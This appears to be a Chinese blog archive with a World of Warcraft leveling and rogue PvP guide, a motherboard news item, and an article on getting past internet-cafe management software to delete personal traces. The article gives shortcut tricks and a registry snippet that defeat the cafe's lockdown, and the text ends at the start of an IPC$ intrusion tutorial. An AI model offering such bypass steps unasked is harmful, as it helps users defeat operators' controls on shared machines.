2005年02月20日

Level 1-5 
- Newbie Area 新手区

Level 5-15 
- <Brill 布利尔>[注] 
- <Mulgore 莫高雷> 
- <Durotar 杜隆塔尔> 
我至少尝试了12个巨魔/兽人,发现巨魔任务逐渐变得困难而且耗时更长了,正式版来了后,说服了巨魔/兽人的朋友们大概8人小团队去转战<Brill 布利尔>,到13级后再来十字路口,发现这样跑容易得多,而且任务的目标之间也很短省时不少……
* 我比较恨<Durotar 杜隆塔尔>,那么丑陋,至少做了8次任务,每次都感觉烦闷 *
如果你还在<Durotar 杜隆塔尔>,确认在8级时候一次就收集所有Senjin村和Razorhill的任务,另外如果需要请学矿工,去学习急救,都在剃刀岭。恐龙蛋,老虎皮,巨魔村,zalazane,mishra头骨都在海岛区域完成,请节省时间。

Level 15-20 
- Crossroads & Ratchet 任务
- Silverpine 
- 副本:Ragefire Chasm 

此处还是有个人偏好,银松森林通过15级比较困难,但更紧凑节省旅行时间。这里你杀人更多,所以敛财也比较多。十字路很有些不同的任务,但缺点是城镇间来回跑太耗时间,所以请你尽可能准备好任务堆叠,如果不想多浪费半个小时跑步。

RFC是部落第一个副本,总共有6个任务,经验奖励很好,我建议发动群众,花点时间组队去副本磨级,收益比外面做普通任务好多了。

RFC流程注意:送信去Thrall屋里Nazgrel,和Thrall说话,消灭burning blade头目,得到一个RFC任务。如果不接手初期任务,你将得不到后面的RFC(我知道这个,因为我不太关心向Thrall介绍自己,呵呵)

Level 20-30 
- <Stonetalon Mountains 石爪山> 
- <Ashenvale 灰谷> [23+ 适合单干] 
- <Hillsbrad 希尔斯布莱德>[注] 
- <Thousand Needles 千针石林> [26 适合单个] 
- 副本: Wailing Caverns [18-25] 
- 副本: Shadowfang Keep [22-28] 
- 副本: Blackfathom Deep [24-30] 
- 磨皮革: WC [23-25] 鳄鱼是非精英的,而且很靠近入口,很容易潜入去偷皮革,里面会掉盾牌的Kresh大概20+。
部落玩家应该首先进入石爪山STM,去开通Sun Rock的飞行线,那是去Shadowprey Village的跳板(还有一个是雷霆崖)。
<Ashenvale 灰谷>相对有些困难,因为怪物们成群结队在野外游荡,而联盟人在道路上旅行,你越靠近Astranaar越可能被袭击。

在公测时期,我花了很多时间在WC磨级,为了得到Deviate Scale Belt制作材料,10格包包,15DPS锤子还有差不多全部的fang套装,还有Wingblade。是个练经验的好地方。

盗贼和布衣必须知道SFK,Meteor Shard我用了很久,直到我拥有了Swinetusk Shank(来自Razorfen Kraul)搭配Zealot Blade。Arugals的长袍和腰带非常好,我看到有40级的法师还在用这个腰带。

对30-40的联盟来说<Hillsbrad 希尔斯布莱德>是个好地方,巢穴近而适合联合攻击那里做任务的部落玩家。这个区域任务冲突很严重,比如25个人去杀熊,同个地方却32个人在杀雪人,我肯定死的人不少,高级别去那里都是一种赌博,所以必须警告。

副本Blackfathom比SFK困难,但相对来说奖励也更高级,对于好的潜行盗贼来说,那里可以单独干掉一个28级元素拿到任务物品Fathom Core

Level 30-37 (这部分对我来说比较新,
This section is freshest on my mind as I got my mount Friday and im almost 44 as of last night.) 
- <Thousand Needles 千针石林> & Shimmering Flats (<Thousand Needles 千针石林>东端)[28-34] 
- Alterac Mountains [33-43] 
- <Stranglethorn Vale 荆棘谷> [PVP服务器警告] 
- <Desolace 德索雷斯>[32+] 
- <Arathi Highlands 亚瑞斯高地> [33+] 
- <Badlands 荒地> [35+] 
- 副本: Razorfen Kraul [30+, 推荐32级组队] 
- 精英区: Dungarok [30+] 
- 磨级/打钱 [Rock Elementals 38-40] 

*PVP服务器注意(PVE和RP服务器可以忽略)在中等或高人口的服务器,荆棘谷内联盟人数众多,为了这里的好任务,你已经被警告过了。最便捷方式是坐UC和org城的飞船。

<Booty Bay 藏宝海湾>有条飞行线,PVP玩家建议在40+后去获得,或者在人少时候去。因为你不能依靠<Booty Bay 藏宝海湾> 海盗来保护你免受20+联盟恶棍的恶意攻击,而且他们还会守你的尸体。

度过20+的后期,<Desolace 德索雷斯>比较不喜欢,那里比较稀疏和丑陋。不过也有些有趣的任务,如果你喜欢杀半人马的话。将来可以接到40+的副本任务。

Shimmering Flats 盐湖区是33级左右获得经验的好地方,有30-33级别的蝎子/海龟/爬虫/鸟,也35级的爬虫,磨级/打钱的话去找南部35级孳生的地方。掉落和皮革可以加速你购买坐骑能力。

再往南,是Tanaris沙漠和Gadgetzan城有直通的飞行线路,Gadgetzan有银行和拍卖所,小心这也是联盟高级玩家喜欢来的地方。

如果你能通过高等级朋友帮助到达<Badlands 荒地>,那真是幸运,他愿意陪你走那么长的艰苦跋涉,从Grom’Gol, Stranglethorn 或(上帝禁止的) Hammerfall一侧。你的奖励是东大陆的中途飞行站,可以从UC直接到Grom’Gol。做40+的副本UldaMan,还有后期几个高级区域。

Alterac 是许多<Hillsbrad 希尔斯布莱德>任务的后续,就在Tarren Mill北部,在PVP服务器投掷硬币吧,可能会碰上绵绵长战,也可能碰不到一个联盟玩家。

LEVEL 38-43 
- 精英任务: Arathi 
- <Swamp of Sorrows 悲伤沼泽> 
- <Feralas 菲拉斯> 
- <Dustwallow 尘泽泥沼>
- 副本: Scarlet Monestary 
- 副本: Uldaman 
- 副本: RazorFen Downs 
- 磨级: 兽人[40 普通 - 47 精英] 

LEVEL 44-47 
- <Tanaris 塔那里斯> 
- Searing Gorge 
- Hinterlands 
- Stranglethorn 
- 副本: Zul’Farrak 

LEVEL 48-60 
- Blasted Lands 
- Ungoro Crater 
- Silithus 
- Western Plaguelands 
- Burning Steppes 
- 副本: Temple of Atal’Hakkar [52+] 
- 副本: Blackrock Depths 
- 副本: Blackrock Spire 

2005年02月15日

毒:

毒是盗贼最好的朋友。不要吝啬,尽情用吧。下面我会分析每种毒的特点与用途:

Crippling Poison(残废毒药):
降低目标的移动速度。没人能在每次战斗中时时刻刻将敌人陷入眩晕中,一些怪也会在血不多的时候逃跑。PvP中我每次都用它,这样敌人就不能放我的风筝,因为他自己也跑不远。

Mind Numbing Poison(心灵腐烂毒药):
显著降低目标的施法速度。PvP中并不如想象中的有用,法师们有太多的瞬发和通道法术了。但是对于术士和牧师则很可怕,如果他们的恐惧将需要9秒的吟唱时间,你觉得你还能被恐惧吓得到处乱窜么?很多盗贼在PvP中同时使用残废和心灵腐烂毒药。

Instant Poison(急性毒药):
增加我们PvP中DPS的很好手段。特别是伏击贼用来追杀掉队伤员的时候。单挑精英时也是不错的选择,尤其是我会常常使用我的凿击和致盲,如果这时使用致命毒药则会打断眩晕。

Deadly Poison(致命毒药):
这毒药让我很恼火,PvP中不能用凿击和致盲是很糟糕的事情。但是这种毒药能带来最高的伤害,打钱的时候致命毒药是不错的选择,它能让我杀怪的速度提升很多。

Wound Poison(致伤毒药):
感谢暴雪!给我们提供了新毒药!哦不。。致伤毒药只是个FC。。。我只希望它能在战场系统里有用武之地了。致伤毒药的持续时间只有15秒,即使叠加5次,也仅仅能减少牧师的500点的加血量。而一次重击的医疗技能可以加3000血。我宁可让他们晕到死。

不要犹豫,用毒吧。我承认我可能是因为懒惰。队伍里的萨满会抵消你主手的毒,而副手又不经常能命中。但聊胜于无,有总比没有好。

部落制毒任务:
*略*

联盟制毒任务
*略*

进阶PvP指导:

晕,晕,晕,不停地晕。保持用偷袭开局的习惯。你要知道你不是打算在荣誉堂上留下名字的英雄,你只是个潜伏在阴影中的肮脏的嗜血动物。你不会在正面的战斗中比其它职业有更高的胜率,你要做的是让他们在整场战斗中动弹不得。相对于控制来说,DPS是次要的。战斗中,一个术士会尝试着控制你而不是让他的宝宝和你搏命。同样,一个法师也会善用他的冰环和闪烁技能与你保持距离。
偷袭是PvP中应该使用的起手技,以下是我通常会用的连续技:
偷袭,险恶攻击,凿击,绕到对手背后,等待能量回复,冷血,剔骨,致盲,等待若干秒(译者:原文这里是“Vanish,Wait”。我认为这是作者的笔误,故作修改),潜行,偷袭,险恶攻击,凿击,预备,冷血,剔骨,致盲,等待,潜行,偷袭,险恶攻击,凿击,剔骨。
以上是三套完整的能让对手完全陷入持续眩晕状态并以剔骨结束的连击。其中两次剔骨肯定是重击。如果这套连击被顺利地完成,那么游戏里任何一个职业都会因此而倒下。
听起来很简单?不。首先,对时间和位置的把握相当重要。你剔骨之后必须迅速跑到对手后面,否则你将会被眩晕,接下来掌握主动的将是对方。你也必须掌握好凿击和致盲的时间——太短了你不能回复足够的能量,太长了你就会失去对对手的控制。Miss也是不可忽视的因素,如果Miss的是普通攻击,那无所谓,但如果是一次冷血剔骨,甚至是偷袭、凿击或致盲,那问题就大了。更糟糕的是,在以上那套连击里,我们考虑了由主动天赋带来的额外连击点,许多人问我如果我恰好没得到那些连击点怎么办。我的答案是用放血来做一些弥补,但是这样仍然不能完全解决能量问题。因此有时在四星时就释放剔骨也未尝不可,毕竟控制比伤害更重要,在面对面的战斗中,我们有时比其它职业更脆弱。
有时偷袭能成功地晕住目标,但却得不到连击点,这是个bug。当这不幸发生的时候,我会凿击、消失然后再来一次。
腰斩也能眩晕对方,但对于大部分职业来说,这是对五个连击点的浪费。事实上,腰斩只是可有可无地延长了你眩晕对手的时间。拿盗贼来说,如果我偷袭,险恶攻击,凿击,冷血剔骨,除了那些装备很好的盗贼之外,这套连击足以要了对方的命。而我在大多数情况下还能轻松剩下一千多血。顺便说一句,盗贼是相当危险的敌人,一次未击中的致盲可能就意味着把自己的控制权交给了对方。所以,对付盗贼,我会用以下方案:
偷袭,险恶攻击,凿击,腰斩,险恶攻击,喝茶,险恶攻击,险恶攻击,险恶攻击,凿击,冷血,剔骨。
由于要足够的能量来维持眩晕时间的长度,有时做一些四星剔骨是必要的。精神茶的作用是让你能在敌人的眩晕状态下尽可能多地攻击,以保证腰斩的价值。关于这一点,另一件你可以做的事是用放血来代替险恶攻击,这会在全套连击中为你省下50点能量。我用过很多次这样的连击,但是直到现在仍然招无定式,必要的时候还是需要随机应变,比方说为了能更稳妥地控制对手,放一些更少连击点的剔骨。
总的来说这是套可以相当棒地控制某些危险职业的套路。但是不要在战士、小强和萨满身上仅仅使用它,它仍不足以搞定这些皮糙肉厚的职业。你必须接着致盲才能维持控制,这也是我不推荐用腰斩的理由。
炸弹应该也是维持控制的好方法,尽管现在似乎还不起作用。
战士和盗贼能卸除我们的武器。我们应对的策略是在武器上加链子。这玩意不好的地方是和附魔冲突。我个人来说更喜欢附魔,因为卸除武器的效果并不很久,也无法对我们构成重大威胁。如果你的武器被卸除了,疾跑以离开对手的攻击范围是个好办法。如果是一个盗贼卸除了你的武器,那么这个盗贼很可能认为不需要继续晕你。当然,我不这么想,武器被卸除短短六秒的效果结束之后我将会让你明白为什么。我也不是说卸除武器一无是处,事实上,如果我的重要攻击动作miss之后,卸除武器是让我喘口气的好方法。对于卸除武器,不必过于担心。

法师:可能是我们最难缠的对手了。我的攻击滴水不漏,可是他们总有一大堆的办法从眩晕中逃走。曾经,当闪烁技能不能打破眩晕的时候,法师们几乎就是我们的活靶子。现在闪烁可以打破由偷袭和腰斩引发的眩晕效果。对付他们我们最好的武器就是出其不意。如果他们在我们出手之前没发现我们,那么他们很可能没有打开他们的魔法盾,这就意味着他们的死亡;否则,你应该看看你的消失和疾跑准备完成没有了。杀死一个法师不需要很长时间,但如果你不能很好地操控,他们杀掉你同样不需要很长时间。

牧师:你应该把他们打晕打到死。真的得打晕打到死,如果你给他们时间放恐惧,那你就挂定了。你不可能耗完他们的魔,在OOM之前他们可以很轻松地用两次恐惧和DoT干掉你。即使你还能大难不死,等待你的又会是一个撑着盾的满血牧师。所以如果你一不小心让牧师脱离了眩晕,那么准备好凿击和剔击,并且在这之后竭尽所能地再次晕他吧。

术士:你可以把术士当作法师和牧师的结合体来对付。如果术士在你偷袭前发现了你,那你就会得到两个DoT,一个宠物和你死之前的一次大爆炸。跑吧,留得青山在不怕没柴烧。有恐惧的术士甚至比牧师还难缠。两个DoT和一个诅咒会让你没法消失,如果你让他们自由发挥他们会吃掉自己的宝宝(译者:没用过术士,原来术士还会吃宝宝。。。术士连SM女王也吃么-__-bb)以得到一个强力的盾。即使是UD也只能在一次战斗中用一次被遗忘者的意志,如果不把术士控制在眩晕之中,术士将会完全获得战斗的主动。

战士:你每晕战士一次,战士就会损失一些怒气。没怒气的战士什么都不是。但要想让战士一直眩晕是非常困难的。如果你遇到了一个防御专精的战士,那么没有借口,你肯定能打倒他。但是一个有着优良装备的PvP型战士的HP值绝对是盗贼的噩梦。我常常和我们服务器最好的一个PvP战士单挑,如果在两套连击中我的眩晕技Miss了任何一次,或者是我有技能还在冷却中,那么他在这种情况下几乎肯定会击败我。我只有祈祷让我的致盲命中吧。尝试与战士保持距离也是种不错的打法,如果他中了你的残废毒药,那么加速跑开,你会得到足够的时间来绷带和回复能量。

圣骑士:小强皮糙肉厚,还能加血。要想战胜小强,你必须耗光他的魔,尽力将对手保持在眩晕状态。让他加血,加血会费他很多魔。当他OOM的时候你就能轻松搞定他了。不要忘了你的毒药,心灵腐烂毒药和残废毒药是很好的组合,任何一种毒的发作都会显著降低你对手的战斗效率。

萨满:萨满虽然比不过盗贼的爆发力,但是显然要比盗贼更能扛。一个萨满会尝试用地缚图腾去放你的风筝,用火图腾防止你消失。在你没有致盲萨满之前尽量避免走进图腾的作用范围。对于火图腾,我一般是在两个火球的攻击间隔中消失,然后在你被打出潜行状态之前迅速使用偷袭。巧妙地使用你的疾跑,疾跑可以抵消地缚图腾的减速效果。但是如果敌人离你很远,那么也许在你能打到他之前疾跑的效果就消失了。

德鲁伊:小德是个强力的医疗者,如果你的对手是个聪明的德鲁伊,那么他不会用动物形态来对付你。对于有经验的盗贼来说这不应该是一场苦战。然而如果一旦被小德掌握了控制,那么你会陷入持续的根须缠绕与远程炮火中,如果这一切不幸发生了,那么致盲他,然后继续你的持续眩晕吧。

猎人:一个极端难缠的敌人。猎人的陷阱不是很大的威胁,但是我们可能由于猎人的高速优势而被放风筝。不要过早地消失,先尽快地接战,致盲、消失,然后再开始你的偷袭套路。如果必要,用疾跑以便迅速近身。如果猎人不能与你有效保持距离,他便不能取得战斗的胜利。疾跑不足以补偿陷阱和刺击的效果。当猎人想用豹守和你保持距离时,尽力攻击一下,任何攻击都会让打开着豹守的猎人陷入缓慢,然后用凿击等技能逐渐将战斗的主动权掌握住。在战斗中时刻打开探测陷阱以免功亏一篑。不要尝试去卸除猎人的武器,也不要尝试跳过陷阱,那是徒劳。越来越多的猎人在一起交流他们的心得,一个不算太菜的猎人都知道如何正确地保存自己消灭敌人。

盗贼:当我遇到一个盗贼时我只是静静地等待时机。如果你不知道你打法的缺陷在哪里,你当然也很难发现对方的漏洞。当你起手之后,凿击并消失,让他看看什么是真正的“打晕打到死”。

群殴指导:
最棒的PvP战斗发生在100部落挑100联盟的时候。这时候重要的一点是人员要集中,千万不能被各个击破,这一点在WoW中尤其举足轻重。当然了,这一点对于盗贼来说并不完全适用,盗贼有时在游斗中能起到更大的作用,比如在密不透风的防守中靠闷棍让敌人整个队伍慌乱。一部分可能会留守在被闷的人旁边,一部分会来寻找已经隐身了的盗贼,还有一部分则如惊弓之鸟,草木皆兵。这时我方部队有备而来的突击会很容易地撕裂敌人整条防线。盗贼也应该时刻监视敌方盗贼的动向,虽然我们没有比其他职业更优秀的反隐能力,但是有经验的盗贼能够对敌人的行动有准确的估计。他们藏在哪里,哪里就是我们的目标。我总是能成功地发现准备在队友身上实施闷棍的敌方盗贼。
战场系统需要更严密的战术,而且肯定会比现在的大型PvP更lag。我会在盗贼职业指南3.0中谈到更多关于战场系统的信息。

Solo精英心得:
Solo精英并不是打钱打经验的好办法,他们有时会掉一些好东西,但是如果你是想碰运气打Epic装的话,还是去清些普通怪更有希望些。那为什么我要solo精英呢?因为我能。高效率地solo精英需要大量的练习,当你在副本里被迫要单打独斗一些精英时,这些练习会成为你的救命稻草。
记住,并不是所有精英的强度都是相同的,有些59级的精英我根本就不需要靠冷血、规避或者致盲来对付,但是我却打不过一些54级的精英。
恰当地使用你的规避技能,但是对于法师来说规避毫无作用。你也不应该在怪被眩晕的时候使用规避。致盲会让你有充足的时间来回复能量甚至使用绷带。
我们要做的是用眩晕来控制精英。乍一看这似乎是个创举。相信我,你会发现它物有所值。凿击目标然后迅速跑开,不要后退,转身然后跑,把怪甩开一段距离。但是不要太远,以免怪会重置。这样会使你在真正面对目标时有全满的能量(译者:真笨 -__-!)。得到四个连击点后凿击差不多该冷却完成了,再次凿击,接着跑,当怪追到你后腰斩,再攒出四个连击点,凿击。重复以上直到你杀死目标。这样做会让你比扛着打损失更少。

高级副本:
游戏里最刺激的内容之一莫过于跟随一支队伍进入副本了。一般来说在这种情况下队伍里不太会有人能够solo太多副本的内容。对一支队伍来说,如果有良好的团队合作,一个与之级别相称的副本只是小菜一碟。
大部分的队伍不会把盗贼作为主力成员之一,战牧法是铁三角。但是无论如何,一个理智的队伍不会拒绝一个技艺精良的盗贼

Assassination Talents (21 points)

Improved Eviscerate – 3/3 points
Malice – 5/5 points
Remorseless Attacks – 1/5 point
Ruthlessness – 3/3 points
Murder – 2/2 points
Relentless Strikes – 1/1 point
Lethality – 5/5 points
Cold Blood – 1/1 point

Combat Talents (30 points)

Improved Sinister Strike强化险恶攻击 – 2/2 points
Improved Gouge强化凿击 – 3/3 points
Deflection偏转 – 5/5 points
Precision 精准- 5/5 points
Riposte回刺- 1/1 point
Dual Wield Specialization双挥专精 – 5/5 points
Blade Flurry刀刃速攻 – 1/1 point
Sword Specialization 剑专精- 5/5 points
Aggression 侵攻- 3/3 points

Subtlety Talents (0 points)

这是套经典的战斗贼配点方案,很多人称其为30/21。简单地说,这套配点能带来很高的DPS输出,但是其实用性不足。没有预备,没有决定命运,甚至在敏锐系一无所有。说实话我不是很喜欢这样的配点。我曾经很疯狂地测试这套天赋,用过匕首专精代替剑专精,用过强化背刺代替强化险恶攻击等等。预备对于我来说就是大量的伤害和强力的控制,我几乎每十分钟都要去施展一次预备。没有预备是这套天赋的硬伤。
这套天赋的特点之一是DPS输出持续稳定,使用这套天赋时我能准确估计出在多长时间内会造成多大伤害。但是我却不能借助它来击败一只59级精英。PvP中,如果没有强化偷袭和放血,可能会由于能量不足的关系,不能让对手陷入持续的眩晕中。你的DPS是提升了,但是你的控制力下降了。我不喜欢的就是这一点。
时刻关注你的刀刃速攻、回刺和兴奋激发,你需要经常使用他们。
这套天赋是打钱的利器,它让我在对付一般的小怪时变成了一部杀戮机器。缺点则是爆发力不强,不及我的PvP配点以及大多数的伏击/背刺配点

Assassination Talents (21 points)

Improved Eviscerate 强化剔骨- 3/3 points
Malice 凶残- 5/5 points
Remorseless Attacks残忍攻击[ – 1/5 point
Murder谋杀 – 2/2 points
Ruthlessness无情 – 3/3 points
Relentless Strikes持续攻击 – 1/1 point
Lethality 致命伤- 5/5 points
Cold Blood 冷血- 1/1 point

Combat Talents (8 points)

Improved Gouge 强化凿击- 3/3 points
Lightning Reflexes闪电反应 – 2/5 points
Improved Backstab 强化背刺- 3/3 points

Subtlety Talents (22 points)

Master of Deception诡计大师 – 5/5 points
Opportunity 时机- 5/5 points
Improved Ambush 强化伏击- 3/3 points
Initiative 主动- 5/5 points
Improved Sap强化闷棍 – 3/3 points
Preparation 预备- 1/1 point
和我的PvP配点很相似不是么,同样有着冷血和预备。我只不过是在我的PvP配点基础上放弃了一些以便出强化伏击、强化背刺和时机罢了。许多人认为如果要配合背刺,那么决定命运是毫无疑问得加上的,对于这种观点,我强烈地反对。尽管我承认决定命运是调和连击点不足这一矛盾的良剂,但我不愿意拆东墙补西墙。伏击/背刺配点不是堵破墙,虽然由于能量消耗太大的缘故,发动背刺的频率不如险恶攻击,但这套天赋的精髓在于每一击都要拳拳到肉。毫无疑问决定命运不是垃圾天赋,只是针对这套配点的特色,我们的天赋点可以有更恰当的去处。
一个匕首贼必须在战斗中时刻计算能量,估计对手的动向。如果你是那种想尽快放出五星剔骨爽一把的盗贼,那么匕首贼并不适合你。

我不喜欢把这套配点用于PvP,我曾经广泛地测试了很多配点方案,发现最好的连续技应该是:偷袭,消失,冷血,伏击,凿击,预备,冷血,剔骨,致盲,消失,伏击,凿击,背刺,险恶攻击,剔骨。这是一套能让对手有效陷入持续眩晕状态的连击,但仍然有漏洞,主要的漏洞在于伏击之后的那一次凿击,有经验的法师在遭到伏击之后不会转身而是后退,然后就是冰环,闪烁,变羊。还有,这套连击仍不足以杀死战士、小强和萨满——也许是能杀死萨满的,别紧张。应该说,这是对付盗贼、术士、甚至可能是牧师的有效手段。牧师的问题在于在你凿击之前有足够的时间让他撑上盾,关于对付牧师,我会在后面谈到。这套连击的最大问题是能量的规划,这里几乎所有的技能都会消耗60点EN,因而你必须在攻击间隔中等待能量回复,适时地喝茶是较好的解决方案。

我更偏爱用这套天赋PvE,坏处是凿击、背刺什么的太麻烦了,而且效率不高。好处是出一连串重击是件很令人愉快的事情——伏击有很高几率重击,背刺也差不多。

组队PvE的时候这套天赋可能会常常出现OT。我们公会最好的战士能够牢牢控制住怪物的仇恨,当怪物盯上他的时候,即使用撬棒和炸药也无法将怪物的注意力吸引开。但是与我组队的绝大部分Tank是不能做到如此称职——当你以一次伏击起手,那些战士一定已经用过了嘲讽并且拼命把破甲往怪身上招呼了——在这之后你就成了破坏仇恨控制的罪人。但是我保证,世界上最好的战士也不能保证做到完全靠嘲讽就拉住怪,有时你一OT,马上就会被干掉。这往往发生在刚刚释放了一次剔骨的时候。有时我会用腰斩和割裂来防止OT。我用匕首的时候OT是经常发生的事情。

我把这套配点方案作为匕首贼的范例。从这套配点可以衍生出很多其它的配点方案,比如放弃某些天赋可以加满残忍攻击,残忍攻击曾经被如此厉害地削弱过,但是聊胜于无,相当于一次免费冷血的效果还是很不错的。

PvP配点(我的配点):
Assassination Talents(刺杀) (21 points)

Improved Eviscerate强化剔骨 – 3/3 points
Malice凶残 – 5/5 points
Remorseless Attacks残忍攻击 – 1/5 point
Murder谋杀 – 2/2 points
Ruthlessness无情 – 3/3 points
Lethality致命伤 – 5/5 points
Relentless Strikes持续攻击 – 1/1 point
Cold Blood冷血 – 1/1 point

Combat Talents( 格斗)(5 points)

Improved Sinister Strike强化险恶攻击 – 2/2 points
Improved Gouge强化凿击 – 3/3 points

Subtlety Talents(敏锐) (25 points)

Master of Deception 诡计大师- 5/5 points
Camouflage 伪装- 5/5 points
Elusiveness狡诈 – 1/5 point
Initiative主动 – 5/5 points
Improved Sap强化闷棍 – 3/3 points
Improved Rupture 强化割裂- 3/3 points
Preparation 预备- 1/1 point
Improved Cheap Shot强化偷袭 – 2/2 points

2004年10月21日

虽然现在采用LGA775的处理器还没有上市,但是已经有很多厂商按捺不住了。今天,我们得到了来自七彩虹的一款支持LGA775处理器的主板样卡的图片。虽然还仅仅是样卡,但是我们已经能从中看到以后i915,i925主板的一些细节了。

  该主板的北桥采用Intel的i915G,南桥采用ICH6R芯片。支持DDR2内存,板载千兆以太网络芯片,没有提供AGP扩展槽,提供PCI Express扩展槽。由于是样卡,所以Azalia音效芯片还没有被加载,芯片的位置上还是空的,但是已经预留了8声道输出口

图为:DDR2扩展槽

图为:千兆以太网络芯片

图为:主板全图

到网吧上网后,心里总感觉不怎么踏实,但是网吧中要想删除个人上网记录,却还要过网管软件这一关。下面,我们就来讲讲如何才能突破网管软件的限制,轻松删除自己的上网遗留信息。

  Cookie记录

  Cookie是Web服务器发送到电脑里的数据文件,它记录了诸如用户名、口令等重要信息,甚至包括你的银行帐户信息!

  如果要查看Cookies,必须要访问C分区。可是网吧的管理软件一般禁止访问该分区,例如现在流行的管理软件美萍、万象、还原精灵等,虽然它们各有不同,但大体的工作原理却很相似:用虚拟的桌面环境取代Windows桌面,通过设置禁止各种Windows系统的基本操作,迫使用户只能在软件的限制下活动。解除网管的关键就是如何访问到本地硬盘,一旦进入了本地硬盘,删除cookie以及后面要讲的其它个人信息就不在话下了。

  呵呵,不要着急,请用鼠标跟着来。

  第一招:随便打开一个网页,然后点击IE浏览器菜单中的“文件”→“另存为”,然后在弹出的窗口中选中任意一个文件夹,接下来按Shift+F10键调出鼠标右键,选择其中的“资源管理器”或“我的电脑”便可以打开选中的文件夹。

  第二招:如果你运气不那么好的话,“资源管理器”和“My Documents”等窗口都被禁止了,第一招便无效。不过,网吧绝对不会没有QQ程序的,嘿嘿,打开自己的QQ,然后点击面板上的“TE浏览器”图标,启动TE浏览器,美萍所做的设置对IE管用,但是对TE却一点用都没有。你瞧是不是什么都出来了?

  第三招:不会这么倒霉吧?对方将“Tencent Explorer”也加入到“管理”选项卡的“禁止”选项卡中啦?不要失望,请单击IE的收藏夹图标,浏览器出现了一个收藏夹项目区,选择其中任意一个项目,点击鼠标右键,选择“属性”,在“属性”对话框中地址栏项写的就是该收藏项目的URL,将之删除,改为“C:(或者其他你想访问的盘符)”,点击“确定”保存退出,重新回到浏览器窗口,再点击刚刚修改过的收藏夹,哈哈,进去了!(图1)。行了,现在打开c:windowscookies目录,就可以赫然看到自己曾经浏览过的一些网站消息,敢情还在呀。多留一天多一天患害!那就删呗!

  QQ记录

  在网吧上网,要重点保护的自然要算上QQ了,一些QQ盗窃程序都是冲着你在网吧中留下的QQ记录而去的。我们上网用户如果能在网吧上网后及时删除机器里记录有个人信息的文件,就可以避免大多数的攻击者,而不必担心被利用而破解出了密码。解决办法就是在离开网吧前,在QQ的快捷方式上单击鼠标右键,在弹出菜单里选择“属性”,在“目录”一栏中找到QQ所在目录的路径,进入,看到用你的号码命名的文件夹,然后干净地删除这个文件夹。

  可是打住、打住,网管软件如果不允许你删除文件,也禁止了你的右键,又该如何应对呢?

  别着急,请再跟着做。

  第一步:打开微软拼音输入法(如没有用其它输入法也可)。

  第二步:将光标插入会员卡号的文本输入框内,接着开始往里面输入任意一个拼音字母,然后就会出现拼音的状态条,在状态条上点击右键,或用键盘上的属性键,就会出现一个下拉菜单,选择其中的定义词组(放心,就算系统限制右键,在这也不管用)。

  第三步:如果网管软件将右键锁住了,你则还需要将右键给调出来了,在网页中遇到禁用右键的情况我们会想出许多的办法来破解,其实这些方法中有的也能移植到操作系统中的。就介绍最常用的也最有效的一种方法吧:在需要操作的文件或快捷图标上先点住右键不放,再点下左键,然后松开左键,最后松开右键,这时熟悉的右键菜单便呈现在眼前了。另外还有一招更普通的,用鼠标左键单击选中要删除的文件,同时按住shift+F10键,即可在资源管理器中显示出鼠标的右键菜单。

  第四步:右键出来后,可接着第二步来做,再选择文件菜单里面的“存为文本文件”保存(图3)。

  第五步:在弹出对话框后,随便选择一个文件夹,点击右键,选择资源管理器!

  第六步:选择自己想要删除的文件夹和文件,一切OK。

  以上删除方法百试百灵,网管软件没有防御的方法。

  第七步:有些用户不想删除自己的记录,可以用Winzip把账号目录压缩为一个包文件,给包文件加上一串拗口的密码,再给它换一个别人意想不到的扩展名。在压缩时应将“执行”设为“移动文件”,并在“包含文件夹内容”和“保存其它层文件夹信息”选项前都打上钩。当压缩完成后,账号目录内已经空无一物,你再也不用担心秘密曝光了,除非别人知道压缩包的文件名称和密码。再把包文件放到硬盘上一个不引人注意的角落里或是软盘上。至于恢复,直接用Winzip解包到QQ的安装盘上就行了。也可以保护网吧里的QQ隐私。

  临时文件 历史记录

  上网用户都会将大量的临时文件存放在临时文件夹中,这些东西可不得了!别人要想偷窥简直轻而易举。一定要删!

  具体设置方法如下:打开IE的“工具→Internet选项”,在“常规”标签下单击“Internet临时文件”项目的“删除文件”按钮,会弹出警告,选中“删除所有脱机内容”,单击“确定”按钮就可以了。在同一个面板中,还有一个“删除历史记录”按钮,用上面这个方法,可以一起清除。

  但网吧的网管软件唯恐你对IE动手动脚,一般都会将IE的“工具”栏给禁止了,那么,“工具”栏下的的“Internet选项”就无法使用了。

  如何破解这个禁止呢?

  这次我们需要用到快捷键,找到“WIN”,也就是那个微软的图标,然后+D,刷新桌面。在美萍下的桌面实际是美萍指定的一个目录,而原桌面则被隐藏了,刷新是对原桌面的刷新,只要你不切换其他窗口,我的电脑等将会一直存在于桌面之上。你要做的是:打开我的电脑,然后再点向上,就可以把桌面以窗口的形式打开了,此时你要做的是新建一个文本文档输入这么几行:

  REGEDIT4

  [HKEY_CURRENT_USERSoftwareMicrosoft

  WindowsCurrentVersionExplorer]

  “NoFavoritesMenu”=dword:00000000

  另存为随便一个REG文件就可以了(注意最后要空上一行),之后你要做的就是导入它,等你再次开机时打开我的电脑就会看见那可爱的被网管软件屏蔽IE中的文件和工具菜单了。然后你就去删除你的历史记录和临时文件吧。

  表单和密码

  浏览器有自己记忆密码的功能,如果你在进入信箱和BBS,浏览器提示你是否让WEB自动保存你的密码,如果你点“是”,下次进入,就不用输入密码了。浏览器的这项功能的确很方便。如果在家,这并不什么重要的问题;可这是在网吧,如果用了此功能,恰恰下机忘了清除,恐怕你就很惨了。

  具体设置方法如下:

  1)在Internet Explorer的“工具”菜单上,单击“Internet 选项”。

  2)单击“内容”标签。

  3)在“个人信息”区域,单击“自动完成”,会出现如图所示窗口(图2)。

  4)在“表单的用户名和密码”和“提示我保存密码”的复选框,将“√”去掉,并点击“清除表单”和“清除密码”选项,在跳出的对话框中点“确定”,就可以将你保存在浏览器中的表单和密码清除掉了。如果网吧将你的浏览器的“工具”按钮禁止了,按第三项办法破解就行了。

网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.
不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).
因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!

  二  什么是ipc$
IPC$(Internet Process
